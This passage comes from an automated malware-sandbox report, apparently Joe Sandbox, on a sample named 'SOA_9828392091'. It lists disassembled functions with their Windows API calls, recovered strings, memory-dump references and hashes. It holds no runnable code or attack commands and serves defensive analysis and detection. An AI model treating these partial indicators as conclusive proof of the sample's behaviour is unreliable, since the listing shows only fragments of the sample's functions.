                                      • Instruction ID: ea75489078552ac5a074a30fe856133818ef2aed738c0c8c082c53bb6f86705e
                                      • Opcode Fuzzy Hash: c9bdab394e75247884217d607a877c8802f1185043b65c8be8200bab3a2517b2
                                      • Instruction Fuzzy Hash: F9410E7784521CAECF65DB95CC45EDA73BCEBC4310F0041E6BA99A2051EB30ABE98F50
                                      Function 0097D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(009CDC00,009CDC00,009CDC00), ref: 0097D7CE
                                      • GetDriveTypeW.KERNEL32(?,009E3A70,00000061), ref: 0097D898
                                      • _wcscpy.LIBCMT ref: 0097D8C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: fa36f5050279857a74dc19b628af0f1c4f5b21962a9dad49ab4232e04dec46f2
                                      • Instruction ID: 39ce7a01097eed7c0e36b72094b7d13c75d2b6d2b70bb997b62d8fe37636cfa7
                                      • Opcode Fuzzy Hash: fa36f5050279857a74dc19b628af0f1c4f5b21962a9dad49ab4232e04dec46f2
                                      • Instruction Fuzzy Hash: D7517C72509340AFC710EF14D892BAAB7B5EFC4314F10C92DF99A572A2DB31EE45CA42
                                      Function 0093936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 009393AB
                                      • __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 00951557: _xtow@16.LIBCMT ref: 00951578
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf_xtow@16
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 1502193981-2263619337
                                      • Opcode ID: 6b22c7b6cf42c522ddf65c2f60667b5f293434a5e0f7240baff0d777f54c0e62
                                      • Instruction ID: 3d18fdf44be8ad0397819758fd9f2fa2e6fe0ca654c74c63cf1cf5960a2a739e
                                      • Opcode Fuzzy Hash: 6b22c7b6cf42c522ddf65c2f60667b5f293434a5e0f7240baff0d777f54c0e62
                                      • Instruction Fuzzy Hash: DF41E571504205ABDB24EB74D946FAAB3F8EFC9310F20486AF58ED71C1EAB19941CF51
                                      Function 0099A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0099A259
                                      • CreateCompatibleDC.GDI32(00000000), ref: 0099A260
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0099A273
                                      • SelectObject.GDI32(00000000,00000000), ref: 0099A27B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0099A286
                                      • DeleteDC.GDI32(00000000), ref: 0099A28F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099A299
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0099A2AD
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0099A2B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 3ac4a6d049c27ff3e299f135aea95991e9d5f6b12a3e4aa44624c2e30aed5844
                                      • Instruction ID: a32ab02510097df5553f3a55bc4d7bc88d1fcfa6ff9000e856e86f136bd1cecb
                                      • Opcode Fuzzy Hash: 3ac4a6d049c27ff3e299f135aea95991e9d5f6b12a3e4aa44624c2e30aed5844
                                      • Instruction Fuzzy Hash: 2D31BE31105115ABDF219FA8DD49FEE3B6DFF0A320F100314FA29A20A0D736D811EBA0
                                      Function 00976F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 2620052-3771769585
                                      • Opcode ID: 6a3ce18a5ebabd0841bb5de3af9f766dbe0b5f2a86cbf132c651d7298c51d06b
                                      • Instruction ID: b5694e009b6ff210dda7ce8d8d780bd998960dccb06ac1a5a23ce2efead1ca89
                                      • Opcode Fuzzy Hash: 6a3ce18a5ebabd0841bb5de3af9f766dbe0b5f2a86cbf132c651d7298c51d06b
                                      • Instruction Fuzzy Hash: 1C110672908215ABCB24AB71EC4AFEA77BCEF80721F0441A5F449A6081FF70DE859B50
                                      Function 0095500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00955047
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __gmtime64_s.LIBCMT ref: 009550E0
                                      • __gmtime64_s.LIBCMT ref: 00955116
                                      • __gmtime64_s.LIBCMT ref: 00955133
                                      • __allrem.LIBCMT ref: 00955189
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009551A5
                                      • __allrem.LIBCMT ref: 009551BC
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009551DA
                                      • __allrem.LIBCMT ref: 009551F1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095520F
                                      • __invoke_watson.LIBCMT ref: 00955280
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                      • Instruction ID: 51567eca8364fca1e66612eba56570508b55d669ea1eed63c420d9ec83927b78
                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                      • Instruction Fuzzy Hash: 3171F672A00F16ABD714DF7ACC61B5AB3A8AF40765F164229FC14D76C2E770D9448BD0
                                      Function 00974DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00974DF8
                                      • GetMenuItemInfoW.USER32(009F1708,000000FF,00000000,00000030), ref: 00974E59
                                      • SetMenuItemInfoW.USER32(009F1708,00000004,00000000,00000030), ref: 00974E8F
                                      • Sleep.KERNEL32(000001F4), ref: 00974EA1
                                      • GetMenuItemCount.USER32(?), ref: 00974EE5
                                      • GetMenuItemID.USER32(?,00000000), ref: 00974F01
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00974F2B
                                      • GetMenuItemID.USER32(?,?), ref: 00974F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00974FB6
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974FCA
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974FEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 8bba573f4547ad6989181587a68c774b83457a4f2845bebec430f37b7ead40fe
                                      • Instruction ID: e11acab268cc8a6bb3c3c727ccd9a2bc8f99d06c5fac69015c8d7210bdde3e02
                                      • Opcode Fuzzy Hash: 8bba573f4547ad6989181587a68c774b83457a4f2845bebec430f37b7ead40fe
                                      • Instruction Fuzzy Hash: BD61C072904249EFDB20CFA4DD88ABE7BBCFB45314F148559F809A3252E771AD04DB21
                                      Function 009694E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009694FE
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00969549
                                      • VariantInit.OLEAUT32(?), ref: 0096955B
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0096957B
                                      • VariantCopy.OLEAUT32(?,?), ref: 009695BE
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 009695D2
                                      • VariantClear.OLEAUT32(?), ref: 009695E7
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 009695F4
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009695FD
                                      • VariantClear.OLEAUT32(?), ref: 0096960F
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0096961A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: d617716c05f34aea159d56510f5a3c6a679d2cfa1e6400d4acdd6b1190976084
                                      • Instruction ID: 04789eb50b501d7d8b47d64a98410ac3c73e6e11dc2301e78c5d03ac4c05a6f3
                                      • Opcode Fuzzy Hash: d617716c05f34aea159d56510f5a3c6a679d2cfa1e6400d4acdd6b1190976084
                                      • Instruction Fuzzy Hash: 64415D71915219AFCB01EFA4D8849DEBF7DFF48354F008469F902A3261EB31AA45DBA1
                                      Function 0098ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CoInitialize.OLE32 ref: 0098ADF6
                                      • CoUninitialize.COMBASE ref: 0098AE01
                                      • CoCreateInstance.COMBASE(?,00000000,00000017,009BD8FC,?), ref: 0098AE61
                                      • IIDFromString.COMBASE(?,?), ref: 0098AED4
                                      • VariantInit.OLEAUT32(?), ref: 0098AF6E
                                      • VariantClear.OLEAUT32(?), ref: 0098AFCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 370cbb791a2d3dedd7a97a2a736fdeb78b50476d104b1334146fbce199021834
                                      • Instruction ID: 244b632d41c51e26e26d87b71b9cf1d9caf41d44a96b48100900baa3dcf852ba
                                      • Opcode Fuzzy Hash: 370cbb791a2d3dedd7a97a2a736fdeb78b50476d104b1334146fbce199021834
                                      • Instruction Fuzzy Hash: 38619E712083019FE711EF54C888B6ABBE8AF89714F10491EF9859B392D774ED44CB93
                                      Function 00988107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 00988168
                                      • inet_addr.WS2_32(?), ref: 009881AD
                                      • gethostbyname.WS2_32(?), ref: 009881B9
                                      • IcmpCreateFile.IPHLPAPI ref: 009881C7
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00988237
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0098824D
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009882C2
                                      • WSACleanup.WS2_32 ref: 009882C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 09c48c1ada2945d37ab30648e001420b30a4230645520be6dd8945439d5688d6
                                      • Instruction ID: d110df062aed83e9624afdef666a27bfb5a74fb52a4599f5deb2f8c13f04449f
                                      • Opcode Fuzzy Hash: 09c48c1ada2945d37ab30648e001420b30a4230645520be6dd8945439d5688d6
                                      • Instruction Fuzzy Hash: 1451A031604600AFD710AF24CD89B2BB7E8AF88360F048969F965DB3A0DF34E901DB51
                                      Function 0097E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097E396
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0097E40C
                                      • GetLastError.KERNEL32 ref: 0097E416
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0097E483
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: e4cb7553897e55ef28c8f4de06506b333f6c75c20347c1462575ff8690d2c490
                                      • Instruction ID: 022ddc72b43f17c912787474c44cc40434aacc525f5321a9bc9b6e1839d922ea
                                      • Opcode Fuzzy Hash: e4cb7553897e55ef28c8f4de06506b333f6c75c20347c1462575ff8690d2c490
                                      • Instruction Fuzzy Hash: 41317436A002099FDB01DF64C949BBDB7B8EF89714F14C495E509EB2A1D774DE01CB51
                                      Function 0096B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0096B98C
                                      • GetDlgCtrlID.USER32 ref: 0096B997
                                      • GetParent.USER32 ref: 0096B9B3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0096B9B6
                                      • GetDlgCtrlID.USER32(?), ref: 0096B9BF
                                      • GetParent.USER32(?), ref: 0096B9DB
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0096B9DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 65dfbb973f9bad1fd040b79cc3eb7b760a426975ef0ad7db183a07a2ec57c69c
                                      • Instruction ID: 363037e10dbd07457f234f8ca23982d7ee3952b6f0389925f7f54626def8cf28
                                      • Opcode Fuzzy Hash: 65dfbb973f9bad1fd040b79cc3eb7b760a426975ef0ad7db183a07a2ec57c69c
                                      • Instruction Fuzzy Hash: EA21C8B4A00104BFDB05ABA4CC95EFEB779EF85314F100115F551A32D1EB745855DF20
                                      Function 0096B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0096BA73
                                      • GetDlgCtrlID.USER32 ref: 0096BA7E
                                      • GetParent.USER32 ref: 0096BA9A
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0096BA9D
                                      • GetDlgCtrlID.USER32(?), ref: 0096BAA6
                                      • GetParent.USER32(?), ref: 0096BAC2
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0096BAC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: a7acfc412aeef7134fe1c12a6b04543bba45411456ab526ccf4c7b008ba16629
                                      • Instruction ID: 7ad7dff7f5aa1b8125def1ef8e132b276898c3e4c35a975f57bed63233f159fc
                                      • Opcode Fuzzy Hash: a7acfc412aeef7134fe1c12a6b04543bba45411456ab526ccf4c7b008ba16629
                                      • Instruction Fuzzy Hash: D021C2B4A00108BFDB01ABA4CC85FFEBBB9EF85300F100119F951A3191EB795959EF20
                                      Function 0096BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 0096BAE3
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 0096BAF8
                                      • _wcscmp.LIBCMT ref: 0096BB0A
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0096BB85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: b4b48ade2e932b970ed5a63009e9d01f89a85a1542bd7302717fa531148fc443
